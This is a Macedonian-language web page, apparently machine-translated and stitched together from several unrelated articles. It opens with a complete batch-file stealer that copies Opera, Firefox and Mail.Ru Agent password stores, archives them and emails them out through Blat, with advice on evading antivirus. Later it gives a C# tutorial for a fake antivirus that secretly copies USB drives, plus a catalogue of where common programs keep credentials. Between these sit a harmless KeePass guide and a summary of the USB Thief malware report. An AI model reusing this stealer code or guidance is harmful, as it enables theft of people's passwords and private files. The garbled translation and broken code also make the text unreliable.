Како да направите флеш диск што краде лозинки. Ние создаваме складирање лозинка од обичен USB флеш-уред. Активирајте го заштитениот режим

Во оваа статија ќе опишам колку брзо и без многу потешкотии можете да напишете и да направите вирус кој краде датотеки со лозинки и сето тоа го испраќа до вашето поштенско сандаче.
Да почнеме со фактот дека вирусот ќе биде напишан во bat"e (CMD, можете да ги преземете основните команди), односно во обична текстуална датотека и ќе се изврши со помош на стандардниот, вграден преведувач на Windows - " командна линија“.
За да напишете таков вирус, треба да ја знаете точната локација за складирање на датотеките што ќе ги украде, компонентите на Блат што може да се преземат од off-site http://www.blat.net/ или од нашиот сервер, како и компонента од архиварот WinRaR Rar.exe (можете без него).
Отворете бележник и копирајте го следниов код таму:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y „%systemroot%\blat.exe“ „%systemroot%\wincs\blat.exe“ копирај /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" копирај /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat копија /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite копија /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite копија /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u најава -pw Лозинка ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -прикачи %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ поминете rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

Нема да пишувам многу за кодот на самиот подигање.
@echo off - го крие телото на батинката (за да не е потребно, но сепак)
md %systemroot%\wincs - ја креира папката wincs во системската папка на Windows, без разлика на кој диск е инсталиран или како се вика.
md %SystemDrive%\pass\ - ја креира папката за премин на дискот каде што е инсталиран системот Windows.
md %SystemDrive%\pass\opera\ - ја создава папката опера каде што wand.dat и cookies4.dat од прелистувачот Opera ќе се копираат во иднина (до 11* верзии, Opera ги складира своите лозинки во датотеката wand.dat)
md %SystemDrive%\pass\Mozilla\- создава папка Mozilla каде датотеките од прелистувачот Mozilla (cookies.sqlite, key3.db, signons.sqlite) во кои се зачувани лозинките ќе се копираат во иднина.
md %SystemDrive%\pass\MailAgent\- создава папка MailAgent во која ќе се копираат датотеките што ја содржат историјата на кореспонденција и регистарските клучеви (кои складираат лозинки) од Mail Agent.
md %SystemDrive%\pass\MailAgent\reg- ја креира папката reg
атрибут %systemroot%\wincs +h +s +r- става атрибути на папката wincs, со што ја крие од поглед.
атрибут %SystemDrive%\pass +h +s +r- исто како погоре.
копирај /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- ја копира датотеката blat.exe од локацијата за поставување во папката wincs
копирај /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- ја копира датотеката blat.dll од локацијата за поставување во папката wincs
копирај /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- ја копира датотеката blat.lib од локацијата за поставување во папката wincs
CD /D %APPDATA%\Opera\Opera\ - оди во папката опера каде што се наоѓаат датотеките со лозинки (и други работи) за операта.
копирајте /y wand.dat %SystemDrive%\pass\opera\wand.dat- ја копира датотеката wand.dat во папката опера
копирајте /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- ја копира датотеката cookie4.dat во папката опера
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg „HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- го извезува клучот за регистар magent_logins2, каде што е зачувана лозинката, во папката reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- го извезува клучот за регистар magent_logins3, каде што е зачувана лозинката, во папката reg
CD /D %APPDATA% - одете во папката AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- ја копира содржината на папката Mra\Base во папката MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- ја копира датотеката ver.txt во папката MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- одете во папката со профилот на прелистувачот Mozilla
копирајте /y колачиња.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- ја копира датотеката cookies.sqlite во папката Mozilla
копирајте /y key3.db %SystemDrive%\pass\Mozilla\key3.db- ја копира датотеката key3.db во папката Mozilla
копирајте /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- ја копира датотеката signons.sqlite во папката Mozilla
копирајте /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- ја копира компонентата за архивирање WinRar Rar.exe во папката за премин
del /s /q %SystemRoot%\Rar.exe- ја отстранува компонентата за архивирање од папката Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- архивирајте ја содржината на папката за премин
копирајте /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarкопирајте ја креираната архива во папката wincs
cd %systemroot%\wincs - одете во папката wincs
%systemroot%\wincs\blat.exe -инсталирај -сервер smtp.yandex.ru -порт 587 -f [email protected] -u login -pw Лозинка - ја подготвува Блат програмата за испраќање на архивата со наведување на податоците за овластување и испраќање на писмото Не заборавајте да ги наведете вашите податоци од поштенското сандаче од кое ќе биде писмото со архивата испратени.
ren *.rar pass.rar - само во случај ако архивата не земе погрешно име за време на процесот, повторно ќе ја преименуваме во pass.rar
%systemroot%\wincs\blat.exe -body Files Лозинка -to [email protected] -прикачи %systemroot%\wincs\pass.rar- наведете на која поштенска адреса ќе биде испратено писмото и испратете го.
rmdir /s /q %SystemDrive%\pass- избришете ја папката за премин
rmdir /s /q %systemroot%\wincs- избришете ја папката wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- отстранете ги компонентите на Blat од папката Windows.
del /s /q %systemroot%\blat.lib- отстранете ги компонентите на Blat од папката Windows.
attrib +a +s +h +r %systemroot%\wind.exe- си ставаме атрибути, а со тоа се криеме од погледот.
EXIT - го завршуваме процесот на серија и излегуваме.
cls - исчистете го излезот од сите линии во толкувачот.
Копирано, зачувано како wind.bat и компајлирано во exe со помош на програмата за конвертирање Bat to exe, потоа составуваме сè заедно, односно ги земаме компонентите на програмата Blat и компонентата за архивирање WinRar (можете да преземете) и ги лепиме во една извршна датотека, или со која некоја програма, патеката за поставување на сите датотеки треба да биде %SystemRoot% или %WindowsDir% или %windir% .
Како резултат на тоа, добиваме вирус што нема да биде подигнат од антивируси и ќе испрати архива со датотеки на вашата е-пошта Датотеките што пристигнуваат преку е-пошта може да се дешифрираат со помош на обновување на повеќе лозинки, иако не сите, но. само wand.dat од операта и потоа ако не е ажурирана на 11*верзии Сите други датотеки може да се дешифрираат со нивна замена со ваша.
Мислам дека можеме да завршиме тука, но ако имате какви било прашања, не двоумете се да прашате.
Ви благодариме за вниманието, се најдобро!
©SwAp TheHackWorld.in

Многу компании, вклучувајќи ги Sony и Adobe, веќе станаа жртви на хакери кои украдоа милиони лозинки и други кориснички податоци. Анализата на овие информации покажа дека многу корисници често користат или слаби лозинки како „123456“ или иста лозинка за многу услуги. Ова им олеснува на хакерите да ја завршат својата работа, а во исто време, таквата негрижа е разбирлива: кој е во состојба да запомни повеќе од десетина сложени лозинки?

Едноставно решение може да биде парче хартија залепено под тастатурата. Ниту еден хакер нема да може да посегне по него, но ќе мора постојано да ги следите луѓето во близина на вашиот компјутер. И овој лист не е од корист ако сакате да се најавите на вашата сметка од туѓ компјутер.

Бесплатната алатка KeePass 2 Portable ја решава оваа дилема. За да работи, потребен ви е само USB флеш драјв со 10 MB слободен простор на кој ќе ја инсталирате придружната програма. Во иднина, ќе треба да запомните само една лозинка - за заштитеното подрачје на флеш-уредот. На крајот на краиштата, во него KeePass ги складира податоците за најавување за вашите веб-услуги во форма на шифрирана банка на податоци, заштитена со главна лозинка.

Тројанците кои крадат лозинки нема да можат ништо да намирисаат. И бидејќи повеќе не мора да запомнувате десетици лозинки, можете да користите нова, навистина силна лозинка за секоја веб-услуга. Сега ќе ви кажеме детално како да го користите KeePass.

Како да го направите тоа

1 Инсталирајте сеф со лозинка


Инсталирајте сеф со лозинка

Вметнете го USB флеш-уредот во компјутерот, креирајте нова папка на неа и копирајте ја содржината на архивата со софтверот KeePass таму. Стартувај ја програмата KeePass.exe. По стартувањето, активирајте го автоматското пребарување за ажурирања со кликнување на „Овозможи“ во скокачкиот прозорец. Потоа изберете „Преглед | Промени јазик“ и кликнете „Добиј повеќе јазици“.

Преземете ја датотеката на руски јазик од страницата што се отвора со кликнување на „Руски | 2,25+“. Отпакувајте ја содржината на архивата на USB-уред. Кликнете на „Прикажи | Променете го јазикот“, изберете „Руски“ и рестартирајте го KeePass со притискање на копчето „Да“.

2 Направете нова база на податоци за лозинки


Направете нова база на податоци за лозинки

Изберете Датотека | Ново“ и наведете USB-уред како складиште за лозинка. Во следниот прозорец, програмата ќе ве поттикне да ја поставите главната лозинка. Ќе треба да го внесувате секогаш кога ќе го стартувате KeePass.

3 Активирајте го заштитениот режим


Активирајте го заштитениот режим

За да спречите тројанецот да ја чита вашата лозинка за KeePass, треба да го користите заштитениот режим на програмата за да го внесете, слично на UAC во Windows 7. За да го направите ова, во KeePass, одете во „Tools | Поставки | Безбедност“, преместете се до самото дно на прозорецот и проверете го полето до „Внесете ја главната лозинка во безбеден режим“.

4 Пополнете ја базата на податоци со лозинки


Пополнете ја базата на податоци со лозинки

KeePass може да ги сортира лозинките во групи. Стандардно, вашата нова банка за лозинки има групи како што се „ОС“ или „Интернет“. За да креирате нов запис, изберете ја соодветната група (или креирајте нова), кликнете со десното копче на белата област десно и потоа кликнете на „Додај запис“.

Пополнете ги сите полиња и кликнете OK. Бидејќи повеќе не треба да запомните лозинки за да се најавите на секоја сметка, можете да поставите нови, посложени, кои може да се генерираат, на пример, на веб-страницата passwort-generator.com.

5 Користете автоматско овластување


Ако сакате да се најавите на услугата користејќи KeePass, отворете ја групата во која е зачувана соодветната лозинка. Десен-клик на соодветниот запис во продавницата за лозинки на KeePass и изберете „Започни автоматско бирање“ од паѓачката листа. После ова, програмата ќе ги пренесе вашите податоци во прелистувачот, а прелистувачот ќе отвори нов прозорец каде што ќе се најавите на вашата сметка.

Имајте предвид дека во полето „URL“ мора да го внесете URL-то што обично го внесувате во прелистувачот за авторизација, инаку автоматското внесување лозинка преку KeePass нема да работи.

6 Проширете ги вашите можности на KeePass


Проширете ги вашите можности на KeePass

Ако сакате да ја проширите функционалноста на KeePass, одете во „Tools | Модули | Повеќе модули“, по што ќе бидете пренасочени на страница со корисни екстензии (нашите препораки ќе ги најдете во табелата погоре). Сега кликнете на името на приклучокот за да го преземете и отпакувајте го на флеш-уредот.

Стартувајте го KeePass повторно и одете во „Tools | Модули“. Списокот на достапни приклучоци ќе биде прикажан на дното (некои од нив може да се приспособат).

Најдобрите екстензии за KeePass

Обезбедете безбедна лозинка со дополнителни функции, како што се резервна копија или пренос на лозинка за мобилни телефони.

Име

Опис

DataBaseBackup Поставува заштита на банката со лозинка во случај USB-уредот да биде украден или изгубен.
Шифра со две риби
KeeAgent Додава алгоритам за кодирање што е речиси невозможно да се пробие; Имајте предвид дека ова ќе го направи KeePass да работи побавно.
Разменувач на клучеви Додава алгоритам за кодирање што е речиси невозможно да се пробие; Имајте предвид дека ова ќе го направи KeePass да работи побавно.
KeeForm Ги отвора вашите омилени страници со притискање на копче и автоматски ги пополнува вашите информации за најавување.

Исклучително необичен тројанец: малициозниот софтвер се нарекува USB Thief (Win32/PSW.Stealer.NAI). Злонамерниот софтвер е фокусиран на кражба на податоци, се шири и работи на обичните флеш-уреди и вешто ги крие трагите од своето присуство во системот. Тројанецот е идеален за сајбер шпионажа, бидејќи може да допре дури и до изолирани системи доколку на нив може да се поврзе USB-диск.

За разлика од другите закани за USB кои се инсталираат при стартување и лажни кратенки на апликации за да се активира малициозниот софтвер, USB Thief дејствува поинаку. Тројанецот е дизајниран за фактот дека корисниците често складираат преносливи верзии на апликации како што се Firefox, NotePad++, TrueCrypt и така натаму на флеш-уреди. Злонамерниот софтвер уредно се интегрира во синџирот за преземање на такви програми, претставувајќи се како додаток или DLL-датотека. Така, кога корисникот стартува позната апликација од флеш-драјвот, заедно со неа се стартува и тројанецот (во позадина).

Непознатиот автор на малициозниот софтвер се погрижил за сериозна заштита за неговиот развој. USB Thief се врзува за секој заразен флеш драјв користејќи ги неговите единствени параметри за ID и диск. Некои од тројанските датотеки се заштитени со шифрирање AES128, а клучот се генерира врз основа на уникатните параметри на уредот. Исто така, имињата на датотеките со малициозен софтвер се разликуваат во секој случај: тие се генерираат врз основа на содржината на флеш-уредот и времето на создавање на датотеките. Ако се обидете да го копирате USB Thief на друг флеш диск или обичен хард диск, овој двостепен систем за заштита ќе го спречи малициозниот софтвер да работи и исто така сериозно ќе го комплицира обратното инженерство.

Тројанска структура

USB Thief работи директно од флеш драјв и не остава траги на самиот систем. Тројанецот се состои од шест датотеки, од кои четири се извршни, а уште две содржат податоци за конфигурација. Првиот натоварувач е одговорен за лансирање на тројанецот заедно со преносливата верзија на програмата. Тој го проверува USB-уредот и се уверува дека може да ги напише украдените информации на него и да ги складира овде. Потоа започнува вториот натоварувач. Ги проверува имињата на матичните процеси и се уверува дека работи во нормална средина (и никој не се обидува да го анализира). Третиот натоварувач, пак, проверува присуство на антивируси во системот.

Последната, четврта носивост, која е вградена во процесот на работа, е директно одговорна за кражба на податоци. USB Thief краде документи, слики, списоци со датотеки од сите достапни дискови, податоци од регистарот на Windows и информации собрани со WinAudit. Сите украдени податоци се чуваат на флеш-уред и се шифрираат со помош на елиптична криптографија.

Експертите на ESET забележуваат дека нападите со користење на USB Thief сè уште не се вообичаена практика. Сепак, тројанецот е многу опасен, бидејќи е тешко да се открие неговото присуство, а по отстранувањето на USB-уредот, воопшто не остануваат траги од кражба на информации. Во извештајот на компанијата, исто така, се наведува дека авторот на малициозен софтвер, по желба, може да го „пренамени“ својот малициозен софтвер со замена на товарот за кражба на податоци со кој било друг малициозен софтвер.

За обичните смртници, флеш-уредот е уред за пренос на документи/филмови/фотографии и други лични (а понекогаш и многу лични) информации. Но, за хакерите, флеш-уредот е и жртва и борбена алатка. Денес ќе ви ги кажам сите сложености на тивко протекување податоци од флеш-уреди на вашиот компјутер, а исто така ќе ве научам како да ги претворите безопасните флеш-уреди во програми за резервна копија на лозинки од „голем“ компјутер.

Стапица за туѓи флеш драјвови

Идејата за програмата „Злобниот компјутер“ ќе биде како што следува. Ќе развиеме мала алатка која ќе се преправа дека е супер-мега-напреден антивирус, чија цел е ефикасно да ги отстрани „опасните“ вируси од флеш-уредите. Флеш-уредот заразен со вируси нема да изненади никого, така што нашиот специјализиран „антивирус“ нема да предизвика загриженост кај лековерниот корисник. Напротив, кога вметнувате флеш драјв во вашиот компјутер и гледате порака како: „Откриен е вирус. Правам детално скенирање на сите датотеки за заразени“., – дефинитивно ќе чека да заврши оваа операција.

Подготовка на алатки

Таква корисна програма ќе напишеме во сега модерниот C#. Флексибилноста на јазикот и широката функционалност на .NET платформата ви овозможуваат да развивате апликации со молскавична брзина. Ова е токму она што ни треба. Ние сме заинтересирани за жетвата што можеме да ја жнееме, а не за мачниот процес на кодирање.

Една од важните компоненти на нашата апликација ќе биде интерфејсот. Колку е поцврсто, толку се поголеми шансите жртвата да не го забележи уловот и мирно да чека да заврши антивирусното скенирање. Не се замарав премногу и ставив само слика и ProgressBar во форма на чист проект. Може да имате експлозија и да направите дизајн кој ве воодушевува. Ве советувам да го погледнете дизајнот на некој вистински антивирус и да ја дизајнирате вашата апликација во приближно ист стил.

Ајде да ја поставиме задачата

Ќе претпоставиме дека сме одлучиле за организациски прашања и алгоритмот на дејствување, време е да разговараме за техничките нијанси. Значи, нашиот антивирус треба да ја започне својата валкана работа за време на инсталацијата на флеш-уредот. Штом се појави нов диск во системот, нашата програма мора да ја одреди неговата буква и да започне со копирање.

Пред да почнам да ја пишувам оваа статија, изворниот код на слична програма ми го привлече вниманието. Авторот на примерот го утврди присуството на флеш-уред со периодично пребарување низ сите дискови за присуство на погон од типот „отстранлив медиум“. Отпрвин мислев да одам по истиот пат, но мојот внатрешен глас сугерираше на ирационалност. Откако ги измерив сите добрите и добрите, ја отфрлив оваа идеја и отидов на прошетка до МСНД. Пет минути подоцна се покажа дека не сум го направил тоа залудно. Одговорот е пронајден!

Нема шанси без WinAPI...

Најефективниот начин да дознаете за поврзување на нова опрема (во нашиот случај, флеш драјв) е со фаќање и анализа на пораката WM_DEVICECHANGE. За време на инсталацијата на уредот, пораката се испраќа до сите прозорци, а ние лесно можеме да ја обработиме во нашата апликација. За да го направите ова, доволно е само да се опише функцијата WindowProc. Во пракса изгледа вака:

Повратен повик на резултат WindowProc (HWND hwnd, //идентификатор на прозорец UINT uMsg, //идентификатор на порака WPARAM wParam, // настан што се случил LPARAM lParam //покажувач кон структура што содржи податоци)

Во телото на функцијата, треба да ја споредите вредноста на параметарот WParam со идентификаторите на различни настани поврзани со пораката WM_DEVICECHANGE. За нашиот пример ќе биде:

  • DBT_DEVICEARRIVAL - додадена е опрема
  • DBT_DEVICEREMOVECOMPLETE - опремата е целосно отстранета
  • Добро, знаеме како да утврдиме дека е поврзана нова опрема, но како можеме да бидеме сигурни дека USB флеш-уредот е поврзан? Има огромна разновидност на уреди со можност за „топол приклучок“ (зборувам за USB) (печатач, скенер, модем, итн.). За среќа, овој проблем може да се реши прилично едноставно. Користејќи го параметарот LParam, можеме да пристапиме до структурата _DEV_BROADCAST_HDR, која има поле dbch_devicetype. Значи, врз основа на вредностите на овие полиња, се извлекуваат соодветни заклучоци. Ако е еднакво на DEV_DEVTYP_VOLUME, тогаш е време да се радувате и да плескате - ни е поврзан флеш-уред!

    Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //Големина на структурата DWORD dbch_type; //Тип на уред DWORD dbch_reserved; //Резервиран, не се користи )DEV_BROADCAST_HDR, *CPDEV_BROAD;

    Флеш-уредот беше вметнат во нашиот компјутер, ајде да се обидеме да ја дознаеме буквата на уредот што системот му ја доделил. Како и во „Поле на чудата“, можете да го погодите, но подобро е да ги извадите информациите од структурата DEV_BROADCAST_VOLUME.

    Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //Големина на структурата DWORD dbcv_type; //Тип на уред DWORD dbcv_reserved; //Резервиран DWORD dbcv_unitmask; //flmask; РАБОТЕЊЕ_ВОЛУМЕНЦИИ, *PDEV_ БРОАДКСТ_ВОЛУМ;

    Од сите полиња во оваа структура, ние сме заинтересирани за dbcv_unitmask. Имајте на ум дека ова својство содржи само малку од буквата, а не нејзината симболична претстава. На пример, ако вредноста е 0, тогаш буквата на уредот ќе биде A; ако 1, тогаш Б, итн. За погодност да се добие симболична буква, најдобро е да се напише функција.

    Доколку долго време ја читате нашата колумна и добро сте запознаени со функциите на API, тогаш нема потреба да го читате следниот дел од статијата. Отворете го уредникот и започнете со скулптура на апликации. Ги опишав сите потребни структури и функции; Сè што треба да направите е да ги соберете во програма. Одлучете се, и јас ќе почнам да нуркам особено во .NET и C#.

    Ајде да удриме на .NET

    Време е да започнете со вежбање и примена на вашето знаење на јазикот C#. „Што по ѓаволите? - прашуваш ти. - Потрошив половина статија зборувајќи за WinAPI, а потоа глупаво решив да ги повикам сите функции во форма на мајчин код? Каде е наводната молскавична брзина на развој?

    На некој начин си во право. Нашата апликација навистина ќе користи WinAPI функции (нема поедноставен начин), но ние самите нема да ги опишеме. Многу програмери се соочија со проблемот со идентификување на флеш-уреди. Како резултат на овие судири, почнаа да се појавуваат бесплатни часови за C#, во кои веќе беше имплементирана целата потребна функционалност. Сè што треба да направиме е да поврземе таков шаблон (компонента за читање) со нашиот проект и да повикаме неколку методи. Сега ќе користиме една од овие класи. Но, знаењето за структурите опишани погоре дефинитивно ќе ви помогне при пренесување на оваа програма на Windows API.

    Има многу готови часови кои решаваат слични проблеми, но најмногу ми се допадна онаа од Јан Долинај. Ова лице напиша многу лесен за користење и разбирање код, класата DriveDetector, кој може:

  • Определете дали е поврзан флеш-уред
  • Дефинирајте барање за демонтирање на поврзан флеш-уред
  • Утврдете дали флеш-уредот е оневозможен
  • Добијте ја буквата на уредот на новоповрзаниот флеш-уред
  • Обезбедете листа на датотеки отворени од флеш-уред
  • И што е најважно, оваа класа е исклучително лесна за работа - ова ќе го видите сега. Поврзувањето класа со вашиот проект се врши на стандарден начин и нема смисла да се запре таму. Затоа, да преминеме директно на иницијализација. Се прави вака:

    FlashDriveDetector = нов DriveDetector(); flashDriveDetector.DeviceArrived += нов DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += нов DriveDetectorEventHandler(OnDriveRemoved);

    По инстантирање на објектот од класата DriveDetector, јас ги дефинирам управувачите со настани за DevieArrived() и DriveRemoved(). Од нивното име не е тешко да се погоди за што се одговорни. Најдобро е да се напише целиот код за иницијализација во методот Form1(). Главниот код на нашата програма ќе се наоѓа во управувачот со настани DeviceArrived. Неговиот текст ќе го видите во прилог:

    Низа dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString ("dd-MM-yy-hh-mm-ss"); CreateDirectory(dirName);

    xDirectory flashcopier = new xDirectory();

    flashcopier.IndexComplete += нов IndexCompleteEventHandler(IndexCompleate);

    flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied);

    flashcopier.CopyComplete += нов CopyCompleteEventHandler(CopyComplete);

    flashcopier.Source = new DirectoryInfo(e.Drive.ToString());

    flashcopier.Destination = new DirectoryInfo(dirName);

    flashcopier.Overwrite = точно;

    Обидете се да ја стартувате нашата апликација и да вметнете USB флеш драјв. За неколку секунди (во зависност од тоа колку е натрупан вашиот флеш-уред), целата содржина на USB-уредот ќе биде префрлена во папката од која сте ја стартувале новосоздадената апликација.

    USB грабител

    Сега да го разгледаме инверзниот проблем и да разговараме за нијансите на создавање на т.н. грабачи на флеш драјвови. Принципот на создавање е сосема ист. Треба да напишете едноставна апликација која автоматски ќе се стартува по инсталирањето на флеш-уредот.

    За време на работата, апликацијата ќе пребарува низ папки/клучеви во регистарот во кои популарните програми ги чуваат зачуваните лозинки и, ако е можно, ги копираат сите информации во една од нејзините папки. За да спречите вашето автоматско стартување да предизвика сомнеж кај сиромашниот корисник, потрудете се внимателно да го прикриете. На пример, под менито за стартување.

    Веројатно сте свесни дека таканаречените преносливи верзии на апликации сега станаа многу популарни, односно програми кои можат да работат директно од флеш драјв. Најдобро е да се игра на ова. Дизајнирајте ја програмата во соодветен стил и, за веродостојност, внесете неколку копчиња дизајнирани да стартуваат која било програма. Мојата опција за дизајн е прикажана на сликата.

    Како ќе ограбиме?

    Веднаш ќе кажам дека тука нема потреба да се вршат супер-хакерски дејства. Повеќето програми складираат лични податоци во папката Documents and Settings\User\Application Data\%ProgramName% или во регистарот. Името на програмата значи која било програма. Ако се соочите со првата опција, тогаш ќе треба да ја користите веќе познатата класа xDirectory (или стандардни методи за работа со датотеки) и да ја користите за да копирате сè што ви треба. Во вториот случај, ќе мора да работите со регистарот. Нема да дадам пример за копирање датотеки (веќе го разгледавме), но ќе ви покажам како да комуницирате со регистарот користејќи .NET алатки (користејќи го примерот за одредување на патеката до папката TC):

    RegistryKey readKey = Registry.CurrentUser.OpenSubKey("software\\Ghisler\\Total Commander");

    стринг клуч = (низа) readKey.GetValue("InstallDir");

    Тоа е се. Нема да има повеќе код. Ова знаење треба да биде доволно за да украдете датотеки со вредни информации. За да ја олеснам задачата малку, подготвив листа на најпопуларните програми и ги опишав сите начини на кои тие ги чуваат зачуваните кориснички податоци.

    Пошта.Агент

  • Историја. MA ја складира целата историја на кореспонденција на корисникот во Документи и поставка\%User%\Application Data\Mra\base. Има датотека во основната папка mra.dbs. Ова, всушност, е датотека со историја.
  • Листа на контакти. Списокот на контакти се наоѓа во папката MRA\%user account%\clist5.txt. Имајте предвид дека може да има неколку корисници кои работат со mail.agent (или еден корисник може да има неколку сметки). Затоа, најпаметно би било да ги копирате сите папки што го содржат симболот „@“ во нивните имиња.
  • Лозинка. Лозинката (поточно, нејзиниот хаш) за корисничката сметка се наоѓа во регистарот по патеката - HKCU\Software\Mail.RU\Agent\magent_logins2\%Account% во параметарот ####password.
  • gTalk

    Компанијата Googleсоздава удобни и функционални производи, вклучително и клиент за габер - gTalk. Денес gTalkсè уште не е многу популарна. Не е инсталиран на секој втор компјутер, но понекогаш сè уште се појавува и, за да бидеме на тема, подобро е веднаш да ја научиме нашата програма да добива лозинки и од овој гласник. gTalk ги складира лозинките за сите сметки во регистарот - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts. Оваа нишка ги наведува сите сметки на кои некогаш сте биле најавени gTalk. Лозинките на сметката се напишани во параметарот на низата pw.

    Тотален командант

    Тотален команданте убедливо најпопуларниот менаџер на датотеки. Програмата содржи приближно вагон и мала количка (и ист број може да се додаде на неа со помош на дополнителни приклучоци). Ние сме заинтересирани само за вградениот FTP клиент. Многу луѓе го користат, а лозинките, се разбира, се зачувани.

    TC, за разлика од многу други програми, не ги чува лозинките во регистарот, туку ги користи старите добри ini-датотеки. Лозинките, како и сите потребни податоци за поврзување со сервери (ip, порта, корисничко име, итн.) Тотален командантскладира во датотека wcx_ftp.ini, кој невино се наоѓа во програмската папка. Патека до директориумот каде што е инсталиран Тотален командант, можете да дознаете од регистарот. Погледнете ја гранката HKEY_CURRENT_USER\Software\Ghisler\Total Commander.

    FireFox

    Денес прелистувачот не е само програма за ВЕБ патување, туку цела комбинација која покрај различните можности складира и многу доверливи информации. Типичен пример за ова се веб-формите. 99% од современите локации бараат регистрација. Запомнувањето и постојаното одржување на ум на комбинацијата најава/лозинка за секоја страница е нереална задача, особено ако сте напреден корисник и сурфањето на Интернет не е ограничено само на Однокласници и ВКонтакте.

    Програмерите им го олеснија животот на корисниците и вградија таканаречени „сефови за лозинки“ во програмите. Се регистрирав, се најавив користејќи ја мојата сметка, му реков на прелистувачот да ги запомни ингеренциите - и заборавив. Следниот пат кога ќе ја посетите, се што треба да направите е да направите неколку кликања и веќе сте на страницата. Бидејќи прелистувачот зачувува лозинки, тоа значи дека имаме можност да ја украдеме целата нејзина база на податоци.

  • sessionstore.js - датотеката ги содржи сите зачувани сесии.
  • signons3.txt - шифрирани лозинки (за третата верзија на FF).
  • signons.sqlite - база на податоци на SQLite која ги содржи сите шифрирани лозинки.
  • key3.db е база на податоци што содржи клучеви за сертификати.
  • Сите овие датотеки се наоѓаат во веќе познатите Документ и поставки\%UserName%\Application Data\Mozilla\FireFox\Profiles\%Profile Name% .

    Опера

    Опера- прелистувач кој е многу популарен меѓу руските корисници. Нормално, не можеме да го игнорираме. Значи, ситуацијата со Opera е приближно иста како и со FireFox. Сите лозинки зачувани во прелистувачот се зачувани во Document and Settings\%UserName%\Application Data\Opera\profile во датотеката wand.dat. Излегува дека кога ќе се открие Opera, ќе постапиме на ист начин како и во случајот со FireFox.

    Skype

    Популарноста на Skype расте секој ден. Многу луѓе го користат не како средство за остварување повици, туку за банален, удобен разговор. Сите тајни податоци, како што би очекувале, се наоѓаат во корисничкиот профил (на истото место каде што Opera или FF ги чуваат). За да ги „приватизирате“, ќе треба да го копирате корисничкиот профил од Document and Settings\%userName%\Application Data\Skype\ и да ја извезете гранката на регистарот - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage.

    QIP

    Како и повеќето од претходно опишаните програми, QIP ги складира сите зачувани лозинки во Application Data\qip.

    Копирањето е завршено

    .NET технологијата во голема мера ја поедностави нашата задача, како резултат на што целото кодирање беше сведено на повикување неколку методи. Вие, се разбира, можете да кажете дека ова не е кул и дека е многу поефикасно да се пишуваат такви работи во WinAPI или ASM На некој начин се согласувам со вас, но имајте на ум дека во WinAPI и, особено, во Asma. пишувањето таква програма е вака, нема да биде возможно брзо додека другите пишуваат километарски код, јас и ти ќе жнееме среќа во програмирањето, а ако имаш прашања, пишеш ни.

    Не заборавајте, многу корисници чуваат доверливи информации во папката „Мои документи“. Во најмала рака, може да има интересни работни документи, а понекогаш и цели датотеки со лозинки. Едно време (на мојата поранешна работа) открив на компјутерот на сметководителот уредно форматирана датотека со лозинки за клиентите на банката.

    Како вистински пријател, треба да им помогнете на сите овие луѓе со резервна копија на нивните доверливи информации.

